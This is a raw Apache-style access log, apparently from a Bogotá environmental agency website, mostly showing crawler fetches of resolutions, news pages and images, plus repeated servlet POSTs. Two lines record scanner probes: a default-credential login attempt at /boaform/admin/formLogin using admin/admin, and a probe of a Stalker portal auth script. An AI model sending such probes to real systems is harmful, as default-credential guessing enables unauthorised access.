201.245.192.253 - - [27/Feb/2024:01:55:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:54:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:01:56:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:55:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
216.245.221.92 - - [27/Feb/2024:01:57:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:01:57:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.96 - - [27/Feb/2024:01:57:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1463.pdf HTTP/1.1" 200 609349
201.245.192.253 - - [27/Feb/2024:01:58:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:58:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
66.249.79.96 - - [27/Feb/2024:01:58:42 -0500] "GET /BLA/resoluciones/Autos%202008/1842.pdf HTTP/1.1" 200 276383
180.149.125.167 - - [27/Feb/2024:01:58:58 -0500] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:01:59:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:00:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:59:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:01:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:02:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:02:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:00:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:02:03:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:03:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:04:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
123.4.174.96 - - [27/Feb/2024:02:05:34 -0500] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 1019
201.245.192.253 - - [27/Feb/2024:02:05:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:06:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:07:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:05:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:07:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:08:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:06:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
201.245.192.253 - - [27/Feb/2024:02:08:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
66.249.79.97 - - [27/Feb/2024:02:08:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7175.pdf HTTP/1.1" 200 50738
201.245.192.253 - - [27/Feb/2024:02:09:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:10:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:11:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:12:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:12:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:11:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:13:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:13:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:14:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:12:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:02:15:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:16:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.38 - - [27/Feb/2024:02:16:49 -0500] "GET /secretaria-de-ambiente-acompanara-socializaciones-de-plan-de-manejo-restauracion-y-recuperacion-ambiental-de-antigua-cantera-en-el-norte-de-bogota.html HTTP/1.1" 200 1030
216.245.221.92 - - [27/Feb/2024:02:17:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:17:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:18:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:18:26 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 304 -
201.245.192.253 - - [27/Feb/2024:02:18:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
157.55.39.49 - - [27/Feb/2024:02:19:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/03179.pdf HTTP/1.1" 200 762694
172.22.2.4 - - [27/Feb/2024:02:17:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:19:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [27/Feb/2024:02:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
172.22.2.4 - - [27/Feb/2024:02:18:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:02:20:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39947
216.244.66.195 - - [27/Feb/2024:02:20:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2929.pdf HTTP/1.1" 200 453072
216.244.66.195 - - [27/Feb/2024:02:20:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/3453.pdf HTTP/1.1" 200 414625
201.245.192.253 - - [27/Feb/2024:02:20:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
114.119.132.170 - - [27/Feb/2024:02:21:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2015/&sort=size&order=asc HTTP/1.1" 200 14312
201.245.192.253 - - [27/Feb/2024:02:21:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:22:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:22:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:23:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:23:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:24:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.38 - - [27/Feb/2024:02:24:40 -0500] "GET /conoces-el-indice-bogotano-de-calidad-del-aire-y-riesgo-en-salud-iboca.html HTTP/1.1" 200 805
172.22.2.4 - - [27/Feb/2024:02:23:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:25:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:24:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:02:26:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:26:39 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
216.245.221.92 - - [27/Feb/2024:02:27:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:27:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:28:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
85.208.96.196 - - [27/Feb/2024:02:28:21 -0500] "GET /robots.txt HTTP/1.1" 404 1034
185.191.171.13 - - [27/Feb/2024:02:28:22 -0500] "GET /secretaria-de-ambiente-invita-a-proteger-la-culebra-sabanera.html HTTP/1.1" 200 924
201.245.192.253 - - [27/Feb/2024:02:28:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
104.194.8.237 - - [27/Feb/2024:02:29:04 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/tw.jpg HTTP/1.1" 200 11056
201.245.192.253 - - [27/Feb/2024:02:29:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [27/Feb/2024:02:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
216.244.66.246 - - [27/Feb/2024:02:30:01 -0500] "GET /robots.txt HTTP/1.1" 404 1034
201.245.192.253 - - [27/Feb/2024:02:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39947
201.245.192.253 - - [27/Feb/2024:02:30:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:29:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:30:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
172.22.2.4 - - [27/Feb/2024:02:30:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:02:31:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:32:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:32:05 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [27/Feb/2024:02:32:38 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [27/Feb/2024:02:32:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [27/Feb/2024:02:32:40 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
66.249.66.39 - - [27/Feb/2024:02:33:17 -0500] "GET /carolina-urrutia-secretaria-de-ambiente-en-el-primer-seminario-iberoamericano-de-coberturas-vegetales-urbanas.html HTTP/1.1" 200 864
201.245.192.253 - - [27/Feb/2024:02:33:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:33:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:34:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:02:34:08 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:02:35:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:36:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:34:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Feb/2024:02:37:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:35:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:02:37:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:38:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:38:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:39:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:39:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [27/Feb/2024:02:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
201.245.192.253 - - [27/Feb/2024:02:40:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39947
216.244.66.246 - - [27/Feb/2024:02:40:45 -0500] "GET /voluntariado-ambiental-en-su-dia-exaltamos-la-labor-de-organizaciones-colectivos-y-ciudadanos-por-el-cuidado-de-nuestro-ambiente-en-bogota.html HTTP/1.1" 200 1024
201.245.192.253 - - [27/Feb/2024:02:40:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37256
201.245.192.253 - - [27/Feb/2024:02:41:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:42:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:42:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:40:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:02:41:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:02:43:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:02:43:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:44:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:45:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:46:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:47:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:47:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:02:48:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:02:46:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:02:48:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:02:48:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-245%20DE%202004.doc HTTP/1.1" 200 65536
40.77.167.61 - - [27/Feb/2024:02:48:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/1841.pdf HTTP/1.1" 200 327282
172.22.2.4 - - [27/Feb/2024:02:47:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
173.252.83.7 - - [27/Feb/2024:02:49:14 -0500] "GET /images/31%20de%20enero%20humedal%20La%20Conejera.jpg HTTP/1.1" 200 33808
173.252.83.2 - - [27/Feb/2024:02:49:16 -0500] "GET /images/30%20de%20enero%20Entrenubes%20alcalde.jpeg HTTP/1.1" 200 64486
69.171.251.6 - - [27/Feb/2024:02:49:24 -0500] "GET /images/25%20Incendio%20declaratoria.jpeg HTTP/1.1" 200 90327
173.252.107.1 - - [27/Feb/2024:02:49:26 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.107.4 - - [27/Feb/2024:02:49:26 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.79.117 - - [27/Feb/2024:02:49:28 -0500] "GET /images/24%20de%20enero%20sendero.JPG HTTP/1.1" 200 59121
173.252.95.2 - - [27/Feb/2024:02:49:32 -0500] "GET /images/Comprimida%20incendios.jpg HTTP/1.1" 200 23316
201.245.192.253 - - [27/Feb/2024:02:49:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
69.63.184.116 - - [27/Feb/2024:02:49:52 -0500] "GET /images/Caminatas%20(1)%20(2).jpeg HTTP/1.1" 200 81411
201.245.192.253 - - [27/Feb/2024:02:50:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.107.2 - - [27/Feb/2024:02:51:45 -0500] "GET /alcaldia-de-bogota-y-fundacion-exito-entregaron-en-ciudad-bolivar-la-primera-terraza-verde-de-la-capital.html HTTP/1.1" 200 852
173.252.107.6 - - [27/Feb/2024:02:51:45 -0500] "GET /alcaldia-de-bogota-y-fundacion-exito-entregaron-en-ciudad-bolivar-la-primera-terraza-verde-de-la-capital.html HTTP/1.1" 200 852
201.245.192.253 - - [27/Feb/2024:02:51:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.87.4 - - [27/Feb/2024:02:51:46 -0500] "GET /images/terrazas%20verdes.jpg HTTP/1.1" 200 63951
173.252.79.10 - - [27/Feb/2024:02:51:46 -0500] "GET /images/Aves%20SDA.jpeg HTTP/1.1" 200 75104
66.220.149.8 - - [27/Feb/2024:02:51:47 -0500] "GET /images/arbol%20centro.jpg HTTP/1.1" 200 69467
66.220.149.1 - - [27/Feb/2024:02:52:00 -0500] "GET /images/PREAD%20SDA%201.jpeg HTTP/1.1" 200 65620
173.252.107.119 - - [27/Feb/2024:02:52:01 -0500] "GET /68-de-ejecucion-lleva-el-plan-de-accion-para-las-familias-de-bogota-que-va-del-2021-al-2025.html HTTP/1.1" 200 811
173.252.107.10 - - [27/Feb/2024:02:52:01 -0500] "GET /bogota-y-cundinamarca-consolidan-pagos-por-servicios-ambientales-con-nueva-firma-para-la-proteccion-del-agua.html HTTP/1.1" 200 821
173.252.107.8 - - [27/Feb/2024:02:52:01 -0500] "GET /bogota-y-cundinamarca-consolidan-pagos-por-servicios-ambientales-con-nueva-firma-para-la-proteccion-del-agua.html HTTP/1.1" 200 821
173.252.107.6 - - [27/Feb/2024:02:52:01 -0500] "GET /68-de-ejecucion-lleva-el-plan-de-accion-para-las-familias-de-bogota-que-va-del-2021-al-2025.html HTTP/1.1" 200 811
66.220.149.1 - - [27/Feb/2024:02:52:02 -0500] "GET /images/participacion%2019-12-23.jpg HTTP/1.1" 200 73861
69.171.249.3 - - [27/Feb/2024:02:52:02 -0500] "GET /images/agua%20bogota.jpg HTTP/1.1" 200 74348
201.245.192.253 - - [27/Feb/2024:02:52:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:02:52:05 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.1 - - [27/Feb/2024:02:52:05 -0500] "GET /images/reconocimiento%20practicas%20ambientales.jpg HTTP/1.1" 200 63397
173.252.107.3 - - [27/Feb/2024:02:52:11 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
173.252.107.5 - - [27/Feb/2024:02:52:11 -0500] "GET /distrito-recupera-mas-de-20-kilogramos-de-musgo-y-dos-aves-silvestres.html HTTP/1.1" 200 857
173.252.87.10 - - [27/Feb/2024:02:52:12 -0500] "GET /images/Musgo%2017%20-%2012%20-%202023.jpeg HTTP/1.1" 200 66238
